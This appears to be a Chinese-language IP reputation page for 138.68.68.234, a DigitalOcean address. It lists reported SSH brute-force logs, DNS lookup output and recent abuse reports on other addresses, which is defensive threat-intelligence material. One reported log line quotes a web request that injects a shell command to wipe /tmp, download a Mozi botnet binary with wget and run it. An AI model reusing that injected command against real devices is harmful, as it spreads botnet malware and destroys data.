138.68.68.234 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Germany

运营商(isp): DigitalOcean LLC

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): Data Center/Web Hosting/Transit

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attackbots	Sep 13 17:43:52 vps647732 sshd[10898]: Failed password for root from 138.68.68.234 port 40276 ssh2 ...	2020-09-14 02:35:29
attackspambots	Sep 13 12:08:49 ns382633 sshd\[20008\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.68.234 user=root Sep 13 12:08:51 ns382633 sshd\[20008\]: Failed password for root from 138.68.68.234 port 50270 ssh2 Sep 13 12:21:53 ns382633 sshd\[22580\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.68.234 user=root Sep 13 12:21:55 ns382633 sshd\[22580\]: Failed password for root from 138.68.68.234 port 45654 ssh2 Sep 13 12:30:28 ns382633 sshd\[24406\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.68.234 user=root	2020-09-13 18:34:49

类型

评论内容

时间

attackbots

Sep 13 17:43:52 vps647732 sshd[10898]: Failed password for root from 138.68.68.234 port 40276 ssh2
...

2020-09-14 02:35:29

attackspambots

Sep 13 12:08:49 ns382633 sshd\[20008\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.68.234  user=root
Sep 13 12:08:51 ns382633 sshd\[20008\]: Failed password for root from 138.68.68.234 port 50270 ssh2
Sep 13 12:21:53 ns382633 sshd\[22580\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.68.234  user=root
Sep 13 12:21:55 ns382633 sshd\[22580\]: Failed password for root from 138.68.68.234 port 45654 ssh2
Sep 13 12:30:28 ns382633 sshd\[24406\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.68.234  user=root

2020-09-13 18:34:49

相同子网IP讨论:

IP	类型	评论内容	时间
138.68.68.204	attack	TCP (SYN) 138.68.68.204:49946 -> port 22, len 48	2020-10-11 03:50:21
138.68.68.204	attack	[INST1] Automatic report - Banned IP Access	2020-10-10 19:44:44

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 138.68.68.234
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 25873
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;138.68.68.234.			IN	A

;; AUTHORITY SECTION:
.			348	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020091300 1800 900 604800 86400

;; Query time: 102 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun Sep 13 18:34:44 CST 2020
;; MSG SIZE  rcvd: 117

HOST信息:

234.68.68.138.in-addr.arpa domain name pointer ai.gearup.ai.

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
234.68.68.138.in-addr.arpa	name = ai.gearup.ai.

Authoritative answers can be found from:

最新评论:

IP	类型	评论内容	时间
106.12.172.207	attackbots	Sep 30 17:40:35 * sshd[10269]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.172.207 Sep 30 17:40:36 * sshd[10269]: Failed password for invalid user steam from 106.12.172.207 port 55648 ssh2	2020-10-01 02:34:34
138.68.106.62	attack	[ssh] SSH attack	2020-10-01 02:37:08
176.111.173.23	attack	Rude login attack (11 tries in 1d)	2020-10-01 02:22:22
106.12.193.6	attackspam	Invalid user web1 from 106.12.193.6 port 33428	2020-10-01 02:31:33
108.58.170.198	attackspambots	Invalid user tester from 108.58.170.198 port 42690	2020-10-01 02:50:18
218.92.0.205	attack	Sep 30 19:58:55 santamaria sshd\[13555\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.205 user=root Sep 30 19:58:57 santamaria sshd\[13555\]: Failed password for root from 218.92.0.205 port 27567 ssh2 Sep 30 19:59:41 santamaria sshd\[13558\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.205 user=root ...	2020-10-01 02:43:50
111.230.29.17	attack	(sshd) Failed SSH login from 111.230.29.17 (CN/China/-): 5 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Sep 30 13:03:03 optimus sshd[1631]: Invalid user oracle from 111.230.29.17 Sep 30 13:03:03 optimus sshd[1631]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17 Sep 30 13:03:05 optimus sshd[1631]: Failed password for invalid user oracle from 111.230.29.17 port 52544 ssh2 Sep 30 13:19:24 optimus sshd[19690]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17 user=root Sep 30 13:19:26 optimus sshd[19690]: Failed password for root from 111.230.29.17 port 47718 ssh2	2020-10-01 02:43:06
156.221.15.3	attackspambots	DATE:2020-09-29 22:31:02, IP:156.221.15.3, PORT:telnet Telnet brute force auth on honeypot server (epe-honey1-hq)	2020-10-01 02:39:46
212.119.190.162	attack	Invalid user ftpuser from 212.119.190.162 port 55500	2020-10-01 02:42:04
112.35.62.225	attackspam	Sep 30 12:47:54 prod4 sshd\[12506\]: Failed password for root from 112.35.62.225 port 55562 ssh2 Sep 30 12:52:06 prod4 sshd\[14378\]: Invalid user test from 112.35.62.225 Sep 30 12:52:09 prod4 sshd\[14378\]: Failed password for invalid user test from 112.35.62.225 port 38780 ssh2 ...	2020-10-01 02:31:59
187.189.51.117	attackbotsspam	Sep 30 19:40:17 Invalid user customer from 187.189.51.117 port 63967	2020-10-01 02:35:17
202.83.42.68	attackbotsspam	202.83.42.68 - - [29/Sep/2020:21:33:55 +0100] 80 "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 403 824 "-" "Hello, world" ...	2020-10-01 02:25:56
80.174.107.37	attack	Automatic report - Port Scan Attack	2020-10-01 02:35:38
97.64.122.66	attackspam	Invalid user db from 97.64.122.66 port 22520	2020-10-01 02:33:29
165.22.101.100	attackspambots	"XSS Attack Detected via libinjection - Matched Data: XSS data found within ARGS_NAMES:	2020-10-01 02:24:32

最近上报的IP列表

79.255.10.204	91.137.189.62	202.28.35.24	107.175.151.94
94.208.138.113	185.193.90.98	151.80.77.132	126.207.9.167
117.69.159.249	176.115.125.234	115.99.212.233	147.36.107.34
20.36.194.79	74.120.14.22	27.79.159.141	27.6.184.227
185.245.41.4	89.183.69.234	49.147.192.215	185.237.204.99